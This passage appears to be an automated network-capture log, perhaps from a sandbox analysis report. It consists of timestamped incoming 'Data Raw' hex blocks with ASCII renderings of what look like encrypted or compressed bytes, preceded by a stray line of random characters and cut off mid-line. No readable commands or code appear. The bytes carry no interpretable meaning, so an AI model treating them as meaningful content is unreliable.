f+>[wKWzO[DIm9`>IrCh*% ~tCHaxW}260%qT7ef(Ywe{:T5;J
2023-10-13 13:21:12 UTC	448	IN	Data Raw: 29 34 7b 63 c8 51 14 7f a9 bd c9 bb 8f 98 bf b7 2e 10 dd 88 85 91 9e b3 09 b8 84 10 3b b8 ae 4b 7f 60 44 b7 e6 57 d3 e7 76 88 d8 6a 34 8a b2 88 8d 08 77 2a 7c 90 ac 1b b9 1c ac 59 05 58 78 c0 22 af 81 7f d8 31 fd c5 dc 2d 61 99 74 9d db 93 04 88 f3 5d 6a a0 69 3b 74 dd d2 bc 6d 8f 60 92 b5 59 95 02 08 b3 67 40 94 69 2c 4f 5f 34 89 92 32 4f b4 6a 2d bb df 9b 31 ca 53 c0 5c 73 76 b6 e0 9f 60 6d 12 02 25 46 57 bf 8b b3 40 b0 be 92 8b 2a 0a a9 9a 3d c7 6e 0e 2e 6e fc aa 08 67 c0 95 6a 0c bf 49 9f 70 ba ea 49 d4 ea 7f c5 ac 5c bb b8 b0 2e f9 5c 0a 0d 6c 12 43 10 d1 d0 cd 28 cc 8e 7a 00 69 6c 8f 7a a7 95 8f ce c1 40 af 00 d7 b9 17 32 2c e0 2a be b9 fd 9e 83 ea 45 fd 4f 51 f5 4e 97 dc 50 16 90 2b 62 d1 91 ad 13 34 49 49 4c d2 6c ea a0 6e 14 df 38 c9 31 de d4 82 Data Ascii: )4{cQ.;K`DWvj4w\|YXx"1-at]ji;tm`Yg@i,O_42Oj-1S\sv`m%FW@=n.ngjIpI\.\lC(zilz@2,*EOQNP+b4IILln81
2023-10-13 13:21:12 UTC	452	IN	Data Raw: d0 50 d5 85 6b 5f 49 a2 2e e5 26 3c 47 45 39 62 78 bb f1 db f7 a1 6f 78 f8 fd 4c 0b 0e 68 e3 fb 27 a6 b6 53 cf 31 2e a8 79 1e 16 ce 51 c4 7f a1 39 a3 b9 11 e7 4e 8a 50 67 19 32 55 39 d1 92 4e 8a 7b 0e 62 d3 7c 59 71 10 44 90 48 f7 99 cf 4b e4 cf 90 28 8e a9 24 cc a1 92 da c2 49 58 08 85 0d da 81 c0 78 1f 7e 97 5d ad ee 60 80 28 41 df 07 46 2d d9 74 ba c7 d0 e1 81 8e e8 53 3f 64 e2 9f 15 33 00 60 5e 02 cd 10 30 7d 8d ef 21 f1 10 32 40 5a ba 4e 9c 08 dd 67 ad 89 f9 25 97 ed 78 bf 00 0e b1 0f ca d6 f5 a8 76 ca 20 5b cf d9 58 b9 a9 32 10 0c f3 a9 67 cc e6 37 5a b7 95 8a 92 1a 52 6f cb 5d 64 f3 30 82 f5 e4 18 80 81 23 8c ce e5 60 14 4b 3a 70 12 f9 f4 c0 2d 9f d1 45 d6 66 42 58 20 d7 59 5d 26 a0 87 81 e1 33 6f 40 cf d4 4d 53 fc 3d 85 89 a6 b3 8b ef 74 63 2c b1 Data Ascii: Pk_I.&<GE9bxoxLh'S1.yQ9NPg2U9N{b\|YqDHK($IXx~]`(AF-tS?d3`^0}!2@ZNg%xv [X2g7ZRo]d0#`K:p-EfBX Y]&3o@MS=tc,
2023-10-13 13:21:12 UTC	456	IN	Data Raw: 91 64 6f de 46 1a 76 93 a2 3c 91 9d 9f 6f a5 77 f8 d7 3e cf 95 27 c1 44 05 6f 84 fa e0 b7 50 ff 43 b9 e9 d5 96 97 a7 6a 8c ab 64 d0 6d bc 6e 69 8c 07 e6 b1 61 b2 0e 79 33 26 74 7e bc a6 df 65 5a 72 ad 08 6e 33 fc 2a ef 62 ed a6 cd e2 4e c8 4d 93 61 4b d6 52 e9 76 6a 17 6e 0b 65 de 49 0b 6d 86 38 95 b6 f4 0d 48 a1 87 2a e9 ab 63 52 a5 2b 70 a7 cb 71 f9 fb 02 05 f9 86 d1 a8 f3 72 a3 b0 7f 8e 5c e7 af 3b d0 eb d8 32 3d 83 a7 04 29 82 91 5c 36 c8 34 0a 6a a2 fb d7 06 5c e7 37 bb ef 3b d0 a7 85 4e e6 5c 8a 18 34 e7 f5 61 9a 2c f0 dd fb a2 a2 ef a6 e5 f1 28 0a 79 7c 52 16 3a 7d 56 fb 71 0f 26 64 52 b2 02 1c 94 8f 7e 4e 78 22 34 90 56 be 1f 6b c0 8a 05 50 6a 86 8d d1 dd 81 52 79 14 0c cd 88 9f 8a 45 d5 6c b4 6b 31 97 e5 3e c2 8f d4 1d b1 ae 16 e8 74 18 ea a5 c9 Data Ascii: doFv<ow>'DoPCjdmniay3&t~eZrn3bNMaKRvjneIm8HcR+pqr\;2=)\64j\7;N\4a,(y\|R:}Vq&dR~Nx"4VkPjRyElk1>t
2023-10-13 13:21:12 UTC	460	IN	Data Raw: 72 26 d3 f6 28 82 b1 c6 47 51 ae ca 1a cc 15 1e 2d 63 88 57 06 e8 03 e4 ca 0a a5 bc c1 73 8c f8 b2 d4 99 3a 23 5c 37 6b de 87 29 83 42 9b db f4 07 80 da 71 9c cb ba 38 16 06 1d 7d 1c b7 aa b7 72 d1 42 00 e4 ee d0 bf b7 22 f1 96 26 e3 a1 d8 a8 b1 a5 69 e5 92 c5 34 7f c6 7d d8 7a a0 38 91 28 9b 48 ca a3 8f 4c 76 75 24 3d fb 6f 0d 4c ed d3 98 4b b2 52 f5 cd 6a 9c 7f d9 7e 67 af 16 52 2a b7 bd 12 9f 6f 90 da 2f fb 4f d6 ce d4 ef 3b 96 09 71 fa 7e 25 13 db a6 1b 75 12 51 09 6a 20 52 9b fb 5b 6a e0 49 89 3b 94 72 5f 79 d1 a5 a7 b8 b6 b7 a8 af 6a 0e 32 4d ea 8c 26 be be b0 7b 98 69 3d 5f 60 7d 15 36 bd 2f 35 c2 5c 73 0c 89 09 25 d7 43 1a 6b dc 48 de ac be b5 9f c7 21 8e 6d f8 cc 3c 7c 6f 9b b3 39 a5 03 9f ac e3 cc 26 36 a5 44 45 70 90 a9 4e a6 fa 44 8c d3 0a 53 Data Ascii: r&(GQ-cWs:#\7k)Bq8}rB"&i4}z8(HLvu$=oLKRj~gR*o/O;q~%uQj R[jI;r_yj2M&{i=_`}6/5\s%CkH!m<\|o9&6DEpNDS
2023-10-13 13:21:12 UTC	464	IN	Data Raw: 84 b3 68 32 08 71 4f 82 2c 3b b3 54 87 08 01 52 58 be 68 7f f2 80 14 51 3d 73 d3 5f 6a 5c 8b 30 a1 d2 af e9 07 ce 2a f6 cb 25 ea bc 01 9a 7d ba d5 5a e7 2e 60 a8 4d 7b 8f 23 44 b1 18 89 95 94 95 59 21 27 45 3d 11 39 eb a0 96 4d d4 fc 6f 61 59 91 75 c8 bf 2d bc fd f0 ec 96 5a 3e d0 ef 0d 29 d5 3b 76 3e a2 6d 63 e4 5a e4 a1 fb 7e 41 6a 0d e3 0c 61 72 27 92 8e 26 02 cf 93 eb c6 01 67 de 82 99 bc 32 6f 40 9f fa 57 a8 c5 50 02 e1 c3 79 09 7b 6e 4f 58 25 d7 ff bb b5 2a e1 49 12 0f 0d 0e 66 ac da e1 09 dd bd 4a be 2e af 65 c4 2d fd 0b 85 68 24 ed 1b 60 9f 86 bd e7 0b 50 d8 d6 d2 0a 8f f1 5c a1 80 8b 1b 06 c5 e5 aa 9a 6c 1d 6e dd d8 75 e8 d0 6b e2 43 ab d1 02 5e fd 22 76 9e 6e aa e2 7a 93 e7 b6 af 59 9a 05 33 ae 6d 3f d2 fc 97 6b 5c cd 59 ee 51 cf 4a 4e ea 77 f9 Data Ascii: h2qO,;TRXhQ=s_j\0%}Z.`M{#DY!'E=9MoaYu-Z>);v>mcZ~Ajar'&g2o@WPy{nOX%IfJ.e-h$`P\lnukC^"vnzY3m?k\YQJNw
2023-10-13 13:21:12 UTC	468	IN	Data Raw: ca 24 01 25 6f e3 87 ac ab e0 98 22 01 fb cb 0f 2c 5b b1 4e 4e 29 ba 91 21 40 5a e1 ee cf 54 6e ea a5 7e 63 ea 2f f1 35 0a af 69 33 50 4a 0b b1 25 c6 43 50 2f de 46 64 7f e9 15 5c 9b ad 90 0d 81 35 94 9f 36 f5 c7 dd 2a e5 6e aa dc 12 7a 5c 6f d0 f4 91 f6 43 e2 9e c9 00 fe ee 35 fb 6b a9 3d db c8 b7 ba 8d 25 7d 45 81 99 3a 63 f2 26 36 c9 54 cc f4 c5 73 70 e5 8d e4 ad be a1 13 93 c5 9f 57 8a d8 78 ca b6 a3 d7 f2 8e a6 57 65 8c 3b c6 42 80 ee 13 a1 ee 9b 74 e7 b5 2b a5 be f8 5a 97 a1 46 da 02 4b cf cb 0c 81 e9 2c 55 b2 af 63 a3 7c eb 38 be 75 73 17 7d 71 2f b6 83 69 11 b4 da 68 6c d2 f9 ee 1c 4b 71 eb 96 46 45 b6 e4 ce cf cb 72 fd 87 95 40 3f 0d 43 ca 8e 3f cb 14 5d 56 d9 df f6 b4 02 89 0c 22 2e 9d 3b 3b 8c db 99 d4 36 eb 43 a5 b2 84 a1 44 fe 39 99 90 d8 24 Data Ascii: $%o",[NN)!@ZTn~c/5i3PJ%CP/Fd\56*nz\oC5k=%}E:c&6TspWxWe;Bt+ZFK,Uc\|8us}q/ihlKqFEr@?C?]V".;;6CD9$
2023-10-13 13:21:12 UTC	472	IN	Data Raw: 49 2f 2b b4 32 d7 85 c3 bc 74 b2 36 14 38 a4 14 bf 9a 3c bc 09 96 af aa ab 73 aa fb f5 8c 3a bd c7 48 69 9c 1f 09 ad 7d 07 dc bb d9 75 20 30 00 c6 57 a1 15 20 78 a5 e2 70 b2 9c 6f 56 42 b0 8a 43 17 8b 50 42 41 d7 e9 5a e7 7d 32 94 ae 07 33 39 a4 50 77 14 2c 0a 85 91 eb 1f c4 5b 2d f6 c0 7a 42 94 b8 d2 81 df 72 c7 10 88 0c 8f 74 ef 8a d2 c6 f8 5b 31 a6 43 9c 00 7d 18 6c 16 86 37 24 fe 5e 20 41 9b c5 e5 f4 a0 fe d0 ef d6 9b 7f 8b d3 74 bd c8 8d f2 2a c7 02 6e 9f e5 38 a6 a0 53 29 d9 97 fc 79 f0 9d db 78 0b 35 cb 23 88 b3 76 80 6c 32 bc 30 55 a0 24 06 fc c0 f1 17 fd 90 51 c0 e9 82 f1 f5 9e 91 85 2e a1 50 95 79 fb 0e cf 93 e5 39 45 61 be d5 8b c1 90 5c c5 0e 8d 28 31 2e ae 36 09 5b 73 cd 47 06 6c 4b ef 8d 2c 4f 3c 0d f8 3a fe e3 15 ec 24 0a e3 96 c3 0a 0e a9 Data Ascii: I/+2t68<s:Hi}u 0W xpoVBCPBAZ}239Pw,[-zBrt[1C}l7$^ At*n8S)yx5#vl20U$Q.Py9Ea\(1.6[sGlK,O<:$
2023-10-13 13:21:12 UTC	476	IN	Data Raw: d2 39 bf 16 79 0a a5 35 22 05 94 4b 56 72 b4 be 7d 08 35 4d 1b 7c af 9f d2 7b 4c 42 38 9b 4d 3e 58 3d 91 03 9a d2 04 ea 64 27 3b c4 5c a1 b8 58 fe 41 f5 28 29 9e e1 bb 39 03 75 01 70 8c 60 fa 8c 08 6a 9a be 7b ef 44 10 25 2b 6e 26 79 66 eb 61 cf 1e 9f 6a 22 41 49 a2 a0 98 e6 24 53 1e f0 5b 57 3e 69 b7 38 8d 15 1f 3f bb 43 62 d7 59 f9 d7 d9 9b fe 9f b5 c7 7d 0a 96 b5 3a 7c 5d 2e 95 65 fc f3 e3 4d 0e 1c 2c bf ad 1b 1a 72 f9 b2 7a 81 52 a3 ca 35 5f d6 d9 70 c8 fe 03 f7 c3 f3 c2 b7 6c 66 d1 9a 71 8d 09 bf c8 89 cb 6d 6e f2 6a 29 74 47 b1 23 6b 70 fa bb b3 23 29 56 b0 d5 3e 83 97 39 43 10 8e 42 3e c3 f4 89 e3 16 d6 7e a4 5b 96 e9 da 7f 90 2e 52 30 53 e3 60 b6 2f d7 55 da f6 f8 27 71 80 8c 88 e9 a2 54 93 8b 48 03 28 aa 63 d0 0d 7c bf 54 79 af d1 3e 3a 00 b6 5f Data Ascii: 9y5"KVr}5M\|{LB8M>X=d';\XA()9up`j{D%+n&yfaj"AI$S[W>i8?CbY}:\|].eM,rzR5_plfqmnj)tG#kp#)V>9CB>~[.R0S`/U'qTH(c\|Ty>:_
2023-10-13 13:21:12 UTC	480	IN	Data Raw: ba ec cb 37 95 29 7a 11 b1 70 4e 7b 3d 6c d8 e8 82 72 85 15 99 2a f3 59 6e dd d8 ac a3 b9 1f d4 a2 85 fc 13 72 d6 18 3e ce 23 10 70 d9 94 84 4e 26 85 2b a8 77 6b 94 8a cc 28 99 5b c2 a0 03 6a 57 a4 c5 ca 59 b7 dd 18 42 03 b8 4c 7f ff 58 e2 29 60 cf e7 46 5b a0 f0 9f 69 ee 15 e3 5e a6 d3 a3 14 45 1a 38 9b 4f f0 61 23 e1 f8 46 93 cd 33 f7 0f d8 fc 6e 24 9c 4c d4 70 a8 a3 ac 73 8c 9f 85 18 d3 f0 e8 d1 ed 6e 8e f6 fd c3 c6 26 39 7d f3 d5 30 70 2a 25 c8 30 01 44 31 9d 3a 53 97 e8 1f 56 80 c1 ad 42 ce 4f ac ca b8 4c d5 2b d6 86 e5 ad e8 30 d7 80 fd 44 22 68 65 8d 63 f7 ae 8e c3 bd 21 3a 57 38 e6 4c 5c fe 68 37 41 fe 0e 1b 5d d1 1d e2 9d 05 37 b0 35 5e ef 29 7c aa a3 7b 56 25 71 23 42 68 54 59 02 ee b3 91 e6 ef 79 ef e8 4d 35 b9 95 b8 b2 6e 49 8a 0c d3 34 f6 45 Data Ascii: 7)zpN{=lrYnr>#pN&+wk([jWYBLX)`F[i^E8Oa#F3n$Lpsn&9}0p%0D1:SVBOL+0D"hec!:W8L\h7A]75^)\|{V%q#BhTYyM5nI4E
2023-10-13 13:21:12 UTC	484	IN	Data Raw: a4 8d b8 dd bb 4d dc 18 26 c0 a0 7e 55 ef 4a d7 4e b4 d8 75 c9 06 f9 fe 1e 42 57 ce a7 11 2a 76 20 5d b5 0e 6b 68 be c0 31 62 91 fd 25 d2 b9 29 2d 30 21 da c9 d2 a9 36 bb 7b cc 71 be 96 41 fa 6b 7a 63 e1 83 7f 8a b7 4d 3c 14 e5 af 7c d3 be 5d 3e a5 5c 72 f9 c9 2f 50 9f 97 70 44 b4 25 52 5b 54 71 aa f8 e5 16 72 1a c9 60 6f 6a f9 5e 6f f7 cd 0e 8d 30 a1 a3 e9 7a e4 fa f6 38 90 db 21 e9 fd c0 d4 21 0f 51 06 c5 cb c3 a6 36 de eb df ef 9a b5 32 d7 42 f2 ce ac 11 cb b2 e6 2d ce 8b 84 ea fc 52 f7 30 5f 51 70 28 fa 0f 5d 4f 00 4c 30 4e e9 e8 10 84 32 8d 11 d4 06 64 32 fe 8d 6f 01 9c b5 e1 b2 02 82 0b 98 da e1 05 a8 ee 80 57 75 62 fb b5 8d 95 7c 5e 9d af 05 63 05 bc 86 0c 39 c3 dc 60 e7 55 f1 5a 4c a4 8e f9 71 64 4e 4d 8b e0 08 25 7f ab 40 52 2b fb 6f 8e f8 b3 e8 Data Ascii: M&~UJNuBW*v ]kh1b%)-0!6{qAkzcM<\|]>\r/PpD%R[Tqr`oj^o0z8!!Q62B-R0_Qp(]OL0N2d2oWub\|^c9`UZLqdNM%@R+o
2023-10-13 13:21:12 UTC	488	IN	Data Raw: 7e ab 1e 14 be c1 f9 a1 49 08 65 d1 e9 72 92 d4 20 58 4f 8a 83 1d 89 35 57 5e 58 59 f0 76 f2 20 da a8 48 ce 1d b9 0f 35 cb ae b0 a5 30 69 eb 0f 3e 9a 2a ac 64 f7 6e b5 e9 4c f9 b3 4d 89 fc 84 33 e3 4a 03 fa 05 9e cb fc 22 bd f1 92 14 fd 98 33 92 0b fc d1 38 9d 39 26 71 44 cc 99 3b 74 03 f2 95 8f 5e 61 f2 b5 64 66 8f 02 79 b1 fc 32 c8 d8 e9 a9 d9 9a e7 2d 22 87 dd 42 10 a6 d7 cb be 2e 21 5e 5f a2 73 ea dd 9a ef 41 fd bf 62 a4 a8 5a a1 b2 e8 7e f9 c2 75 fb 29 84 1d 78 b7 b9 9e 67 cb 45 bb 65 66 ee 2c c2 a2 da eb 05 f4 a3 39 40 11 cf 4e 95 aa de ce f2 9d aa 9f b5 ac c6 48 1b 06 db b5 c1 2b 07 e8 76 04 a6 08 02 1f f8 b2 fd 7b 13 61 b4 a0 0c a2 8e a7 9a 7b d9 0d a2 a8 27 ac ac 44 68 99 ee ca 1b 4d ce 3f 21 d6 dc 49 a5 a9 45 c7 d0 6a e3 90 37 a7 d5 ef 5e 05 91 Data Ascii: ~Ier XO5W^XYv H50i>*dnLM3J"389&qD;t^adfy2-"B.!^_sAbZ~u)xgEef,9@NH+v{a{'DhM?!IEj7^
2023-10-13 13:21:12 UTC	492	IN	Data Raw: b5 20 b0 fb 77 22 6d 7e 50 5e 8d 55 76 a5 3e 88 13 27 9b 20 0a b5 4d c7 c0 1d aa af 78 02 d1 8a a9 99 7f 18 69 1c 4e f1 a5 34 f7 ed 63 59 08 39 4f 12 b9 2f dc 95 c0 ad 3f a5 2e 46 3a 0a c7 1a f6 28 66 9e ab 70 38 98 bd d3 a6 20 4a 65 e5 03 5e 2b 4e 62 21 d9 8c 24 3e fd b8 5a f7 a5 09 57 7a 5b 12 5c f6 07 0c 5f 33 f9 72 2e 5d 79 79 1c 55 c6 70 9d f3 d1 b7 28 a6 8c c9 18 4a 0f 14 fb 44 61 a1 af f4 c6 4d 6b f5 e1 f7 a7 e9 97 a4 a2 45 19 40 33 e8 ea 8c e2 07 39 af 0d 2a 63 37 58 bc 0d b7 c1 7b b2 86 96 41 b2 3a 45 3c f6 08 7d ae bb 23 db f2 e2 61 48 aa 01 ae d0 f2 19 bf ba 7e 30 37 60 27 2a 9d c0 f9 dc 3e 8c df e0 a5 e3 59 49 a8 a3 85 74 d5 bf 77 dc ee 32 f3 1e d2 e8 18 40 14 e1 34 22 a6 93 95 05 54 4f 72 87 2a b5 37 69 3d 80 a4 b0 5e a8 b4 0c 37 07 89 cb 59 Data Ascii: w"m~P^Uv>' MxiN4cY9O/?.F:(fp8 Je^+Nb!$>ZWz[\_3r.]yyUp(JDaMkE@39c7X{A:E<}#aH~07`'>YItw2@4"TOr*7i=^7Y
2023-10-13 13:21:12 UTC	496	IN	Data Raw: 1e 7b 9a d4 9b 9b ca 2b 1c 57 be 91 42 7f bf 48 08 32 3e b9 13 61 87 13 11 4f a7 ba d7 54 a3 03 46 59 57 d8 c6 e6 11 9c 5a 68 01 a8 03 41 09 0f 84 14 8e 50 dc 0f 8b 5b c2 dc 79 34 f7 5e 2a 94 0f 95 ae 9a e5 a4 ed 62 66 64 d9 70 bd 3c 24 4c 57 f8 8a 79 80 02 24 8a 2d 7f 37 ef ac 81 f4 79 41 be b1 be be 67 12 3e be f4 c9 7c ad 52 41 7c 29 b7 2a de e7 2c f6 e4 8f 11 cd 69 fb 25 4f 68 0e 29 0c 84 62 1a 92 cc 85 ef e1 e6 9c 3c 03 60 c2 a0 71 14 df aa ca 92 2a 9e 6b 80 fb 23 fc 59 2f 97 0c 4c ec fd 95 0a 06 b4 db 87 d0 1d e4 47 10 3b 25 38 48 93 58 fc 57 30 fe 6d fc b5 ad 71 45 dc 54 4b 37 16 40 0a 4f ab 49 3a f0 2b 3a 34 9e 9f b8 52 51 05 38 58 32 d8 2a 0d 8b 4f 79 22 0a 0b bb dd 9b 83 b9 96 e7 f8 92 a8 4d d8 e9 51 39 65 09 0d b8 55 f2 9f 18 cd 6c b0 87 c2 a7 Data Ascii: {+WBH2>aOTFYWZhAP[y4^bfdp<$LWy$-7yAg>\|RA\|),i%Oh)b<`qk#Y/LG;%8HXW0mqETK7@OI:+:4RQ8X2Oy"MQ9eUl
2023-10-13 13:21:12 UTC	500	IN	Data Raw: f1 77 0f 23 15 75 bf 3e 5a bd 84 89 b7 a3 e0 9d 8b 3f 1b 04 90 11 88 ac 8e 54 08 a9 b0 02 da 7d cb 38 ea 42 e3 3e ad de 7b 22 7a 42 b9 d3 4f ae 5d 29 46 ae a4 5e d6 69 5a 56 a9 ae cb 4d 49 45 6f 61 96 29 df 91 d8 5f 31 92 2e e4 73 89 7d 46 9d 5d 98 a9 0a 88 57 ab 02 b6 ef b1 ab 09 9c 97 50 cc f7 c3 9e 10 90 05 ad 3c b9 ab 16 f3 a9 30 54 dd 72 de 73 f6 32 29 38 65 a6 bd 0f 08 be 33 ea 91 2e 70 57 65 5d 68 fb 02 33 64 88 56 73 ea 07 42 ed 18 85 ff 1b 8a 71 b8 6e 6b 5b 98 b7 a8 29 0b 1d 87 3a 4e 0b 62 1d e2 ee 7f 4b 5b 25 5a 32 5e 9c 6c 8e d4 e9 60 66 e9 6c 7b d7 0c 7a 96 d9 13 76 e8 c8 95 6a b7 b0 ae 4c 0d c7 1f f6 36 73 a7 4b 4f e8 11 a9 54 b1 df 22 34 76 33 ac e5 8b 2a 73 db c5 c4 24 6b 1f 3e 60 e0 62 32 52 48 bb 32 ed 43 33 e0 f4 54 ee dd a7 fc 4c 28 43 Data Ascii: w#u>Z?T}8B>{"zBO])F^iZVMIEoa)_1.s}F]WP<0Trs2)8e3.pWe]h3dVsBqnk[):NbK[%Z2^l`fl{zvjL6sKOT"4v3*s$k>`b2RH2C3TL(C
2023-10-13 13:21:12 UTC	504	IN	Data Raw: 8e 8c e9 a9 0f 3c 22 cd 68 49 ab 5e 13 db a6 aa b5 4c 43 13 50 a9 ed 3e a9 59 37 de 0c 8c 69 94 e3 89 f5 c0 f1 d4 8a 52 d0 89 73 52 08 5d bd 49 16 17 70 64 d8 93 ff 4b 8f 03 88 56 c9 29 fa b0 1d dd 66 b4 41 25 74 db 2a 82 b2 c4 11 3d 86 c2 c6 d9 b9 65 95 17 16 2d 6b 46 c7 98 8f 2b 40 bd 0c 79 dc 8d be fd 8f 1c 20 fc b6 69 86 0a 3f f8 de 6a db 52 de 9c 5a 4e 62 95 63 6b ff 17 e7 0f ed 7c 87 35 8c 3f 84 6e 95 03 69 61 09 68 4e 5e 56 21 01 65 6d 51 26 0d ab a1 c4 36 4c da 9b 0c fc 90 a9 1e db 77 12 6d 0f d9 4f 72 1f b4 da 12 43 06 32 45 eb 75 8e b6 6e e1 75 e6 50 44 1e fd 7c 26 1c e4 46 03 d8 d0 84 d4 40 08 1f e5 44 2d 55 ba 8a 11 5b 8e 34 7e e9 d4 72 7f 52 70 37 57 8b 01 fc 1c f9 4f 71 0a 60 6a 2f 3e 25 70 cd c0 02 f1 8f c2 f9 4e d0 1b 3c ff c8 92 71 3d bb Data Ascii: <"hI^LCP>Y7iRsR]IpdKV)fA%t*=e-kF+@y i?jRZNbck\|5?niahN^V!emQ&6LwmOrC2EunuPD\|&F@D-U[4~rRp7WOq`j/>%pN<q=
2023-10-13 13:21:12 UTC	508	IN	Data Raw: 3c 62 1d 90 b6 74 5f 44 0a 1b aa 6c de 1b df 00 c2 b2 f8 38 e2 fd 55 6b bd 20 28 c7 75 4d 6e e4 cd df 94 2d cc ac 34 09 39 93 76 6e d6 b2 70 64 a9 f8 e8 95 e0 a7 38 2a d8 8f c8 25 4f 7a 29 f7 9b 8e 5e 94 16 5d 97 72 d8 5c 9b 79 08 42 b5 8a 47 39 5a 8a 78 bd 1a 39 ed 2a cc fd 48 b6 db 6e 34 3f 2f 03 3c 4b ec c3 ba 3c d6 6a 46 23 53 4c 6e 31 a9 92 a2 8a d5 62 4f ed e3 95 31 98 b8 ef f8 f2 57 f1 99 3c ff cd 88 41 f1 4c 77 cc d3 67 f7 f5 9a a2 94 3e b8 21 9d b3 88 d4 1c bb 1f fa 76 d9 a9 1c 9c 8c 06 60 9e 74 65 13 cd e5 94 99 8d 6b 80 12 f4 80 cb c0 b4 8b a3 96 26 4e 9a f0 62 e4 43 ba 7d 3c 5a 54 f3 4f 82 16 47 5f 47 07 ad 1b 99 aa 55 5c 57 e7 c4 c3 2a d9 51 3b e3 8d 55 d7 eb 8e 13 3e 34 32 3a 64 f5 15 8a b0 09 3b 41 8d 94 e8 ef 99 0a d1 e1 f2 5a 42 8a df fa Data Ascii: <bt_Dl8Uk (uMn-49vnpd8%Oz)^]r\yBG9Zx9Hn4?/<K<jF#SLn1bO1W<ALwg>!v`tek&NbC}<ZTOG_GU\W*Q;U>42:d;AZB
2023-10-13 13:21:12 UTC	512	IN	Data Raw: 68 e1 d1 48 bc 73 1e 6d 91 12 f6 22 09 10 eb 4c c9 6f e9 1c 64 1c da 99 a3 ac 1a 75 dc 61 3f e8 43 bf 5f ae fd 75 8a de cf 46 15 20 59 ca 39 ef d3 61 2d d9 d4 f0 99 29 37 4c 20 1e 5e 41 76 b8 9b 0c 7e 3f 13 03 81 79 95 ce f0 84 a3 6f 06 51 4d 20 60 06 fe 2d 1b 81 50 87 da 31 4b 89 43 d8 fa 1d c9 01 4c 0f e1 68 5d 90 77 70 a7 0c ac cc 7e 53 a8 fd 8e d7 09 8d f3 c6 86 0d 89 c2 96 65 d6 3f 63 07 4f 01 4f 17 73 4a 1a 91 b7 57 c4 ad 53 43 90 cb bf 57 c2 0e ee bf bd 71 7f 93 57 7a 0c 4b c1 5e 9b a0 c3 2e 9c b4 e7 d9 31 5d 30 45 34 63 4a 0b 51 ca 55 ee 09 05 1e 6a bd d9 99 c1 35 4a 22 d0 4c d6 e4 8c 1e c6 45 cf 24 0b 75 1c b5 31 c4 c4 8a 08 34 fa 48 96 4e 17 45 50 74 c6 10 c5 21 58 eb 39 c4 c5 33 77 c8 d7 69 8f 4c 35 6a 67 f4 57 31 9e 30 59 6c 2e 47 b7 bf c2 f0 Data Ascii: hHsm"Lodua?C_uF Y9a-)7L ^Av~?yoQM `-P1KCLh]wp~Se?cOOsJWSCWqWzK^.1]0E4cJQUj5J"LE$u14HNEPt!X93wiL5jgW10Yl.G
2023-10-13 13:21:12 UTC	516	IN	Data Raw: 19 8a 71 70 d8 33 9a b5 cf df e9 cd 12 92 a9 57 2e 3d dc d7 7d 5f b1 16 0c 1f be af 49 82 32 9f 1f 8d 54 c5 f5 bc aa 49 10 84 19 ca 83 1a 0e fe d3 e2 8d 12 45 42 64 7d 68 d1 fb cc 0b e6 e3 54 ef 11 06 62 ac 16 4c c8 af 74 dd 0c f9 ed 8a bd 4b 82 29 fc a3 f6 cb 25 57 a9 04 10 c6 56 e6 c1 7b f2 8c 0f e9 3e 50 f1 31 a0 e4 23 2c 11 2a 43 56 f7 2f 32 25 df 47 c1 b7 ca 2c fe 57 36 33 0c 98 a6 09 14 cf 8a 25 ed 81 11 04 22 e7 42 e4 2a d4 37 ce 78 ca cb 0f 2a 7f 44 09 94 c9 b1 8c 14 c8 80 1f ea f7 93 36 a8 cb d6 01 b4 db b7 f9 60 9d e6 04 c3 4e 2e 16 c7 1e 81 83 14 84 d9 00 e2 15 7c 9a c9 5a b6 ce f3 1d 9f ee b3 cb c1 13 b7 fe 4c a6 e4 e1 74 31 8d 98 a5 4e cc 9c 1a e5 4e be 52 e3 c4 a6 62 93 7a e6 f9 5f 71 91 8e 55 c6 a7 f9 c8 da b3 3b f2 89 7a 14 28 d5 19 39 58 Data Ascii: qp3W.=}_I2TIEBd}hTbLtK)%WV{>P1#,CV/2%G,W63%"B7x*D6`N.\|ZLt1NNRbz_qU;z(9X
2023-10-13 13:21:12 UTC	520	IN	Data Raw: f2 33 76 85 d6 be 8b e8 46 15 21 2a 40 73 11 6c 87 3e 10 69 72 d3 7f 4d 5a 2f ab 4c 54 84 79 39 b6 07 63 22 2f 78 7e 1b a2 56 06 7b f0 85 5b 38 06 3e 97 80 82 d8 32 68 e5 e1 ac c1 b9 83 47 e7 f9 ec a8 87 e5 c7 da d2 75 ad 7c b3 14 4f 38 7d 33 6d d1 af 65 b5 cd a7 ad 12 53 85 52 c5 27 f5 a6 17 8b 38 4c 1b c7 9b 77 2e fd 71 48 27 70 8b 13 dd bb 45 54 a8 df b4 ba 0c 2b 76 b2 2b 71 a5 cd 51 f6 81 f6 bc 26 8b 16 1a 27 62 60 d5 9e 3c e7 d4 ce c8 54 2b 50 3a 75 52 03 fc 46 7e 0f de 7b 5e d6 fe 59 71 23 55 7b 55 1f 11 5e e8 03 05 ab 37 09 10 2e 0d 4d 08 4d d4 54 cb 5f d3 87 e0 01 df cc af 66 cc bd 68 5b 1c 0e ee e4 f4 90 aa da 1e cc 2b 57 f6 2f e7 d2 26 09 1f d9 6d 0b 8e ef 01 d8 00 97 6f 59 03 1a 9e 2b 8f 31 ff 98 a6 9b 7f 7c 32 69 96 f0 6e 94 11 96 1a e4 8a ca Data Ascii: 3vF!*@sl>irMZ/LTy9c"/x~V{[8>2hGu\|O8}3meSR'8Lw.qH'pET+v+qQ&'b`<T+P:uRF~{^Yq#U{U^7.MMT_fh[+W/&moY+1\|2in
2023-10-13 13:21:12 UTC	524	IN	Data Raw: bc be 2c 7b 5f 81 0e 1e 02 ca 88 f4 63 4b 3b 2d 77 d8 30 cc 1f 56 32 7b 95 b7 13 96 bb 3f d0 df 26 4c c4 c6 a3 1f d5 a5 51 d1 d9 a9 e1 18 7f e2 72 d5 dd 2c 2b 5b 37 83 db 08 57 7f 5d 7b 43 f1 d8 50 36 3c 49 6f 7d 6d 64 78 bc c5 b8 43 c5 9d a0 9f 0a 39 06 bf ed 13 10 79 9f e8 0e 00 75 61 cd 1c 8c 48 31 a0 6c fe 42 41 af 92 cf 7b 4d 6e df d9 7a 9e e8 31 0f 1b ce 38 29 63 2d 0d 92 19 5d cd 36 ae 85 92 70 49 dc c6 0e e9 cb 15 4a af 96 25 dd ae 14 5d d8 72 51 02 c3 d8 17 45 a5 dd 83 c0 cf f3 1d 2f 31 ba b0 ed 41 fb a9 e2 0c 01 68 23 50 aa 79 88 bd fb cd 3a 1a 56 d1 fe ae 12 e4 61 a9 7e 34 ae 16 f1 6a 4e 16 53 08 